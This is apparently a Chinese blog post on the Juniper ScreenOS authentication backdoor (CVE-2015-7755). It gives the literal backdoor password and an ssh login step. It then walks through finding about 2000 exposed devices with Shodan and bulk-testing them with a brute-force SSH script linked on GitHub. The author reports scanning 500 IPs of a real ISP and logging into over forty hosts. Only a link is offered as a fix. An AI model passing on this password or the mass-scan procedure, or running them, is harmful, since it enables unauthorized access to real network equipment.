事件介绍

http://bobao.360.cn/news/detail/2514.html

受影响版本

6.2.0r15 到6.2.0r18 6.3.0r12 到 6.3.0r20

分析

https://community.rapid7.com /community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor

后门口令

ssh [email protected]

然后输入口令：
<<< %s(un='%s') = %u

批量验证

使用shodan搜索，2000余台设备

导出结果文件，并使用脚本批量验证是否存在后门口令

以上所有文件在我的github可下载

https://github.com/Xyntax/exps/tree/master/juniperOS-backdoor  

shodan导出格式选择xml 然后使用getIP脚本将导出数据解析成ip列表（存入/dict/ip），将后门口令存入（/dict/password） 使用python brute-ssh即可批量验证，结果存储在（/log/sshd）  

注：脚本扫描结果未去重  

对org为联通的500个ip进行扫描，结果发现有四十多台主机可以登入

修复

http://puluka.com/home/techtalknetworking/screenoscriticalsecurityissue2015.html

参考

http://zone.wooyun.org/content/24531